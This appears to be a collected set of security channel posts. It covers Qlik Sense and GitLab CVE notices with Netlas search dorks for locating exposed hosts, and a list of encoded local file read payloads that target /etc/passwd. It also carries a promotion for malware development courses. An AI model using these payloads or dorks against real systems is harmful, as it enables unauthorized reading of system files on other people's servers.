Dorks List

CVE-2024-55579, -55580: RCE and Broken Access Control in Qlik Sense, 7.5 - 8.8 rating❗️

Vulnerabilities discovered in Qlik Sense allow attackers to run EXE files on the server, as well as remotely execute commands, potentially affecting confidentiality and integrity.

Search at Netlas.io:
👉 Link: https://nt.ls/9ok2E
👉 Dork: http.title:"Qlik Sense"

Vendor's advisory: https://community.qlik.com/t5/Official-Support-Articles/High-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows-CVEs/tac-p/2496004

Brut Security Website is now live- Visit- https://brutsec.com/

Did you know that you can smuggle payloads in your email & phone number if incorrect validation is done!

Payloads for LFR/LFD ⚔️

file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/ 
file:/etc%252Fpasswd%3F/ 
file:///etc/%3F/../passwd 
file:${br}/et${u}c%252Fpas${te}swd%3F/ 
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

BLACKFRIDAY2024 SALE: Get all of our malware development and red teaming courses bundle for only $199.

❌$400
✅$199

Start your new year with developing malware and building offensive tools

redteamsorcery.teachable.com/p/learnthemall

CVE-2024-11274, -8233, other: Multiple vulnerabilities in GitLab, 7.5 - 8.7 rating❗

In a new release, GitLab talked about two important vulnerabilities. One of them allows attacker to carry out DoS, the second allows to steal session data and potentially gain unauthorized access to accounts. Several smaller vulnerabilities are also mentioned.

Search at Netlas.io:
👉 Link: https://nt.ls/xM1vs
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2024/12/11/patch-release-gitlab-17-6-2-released/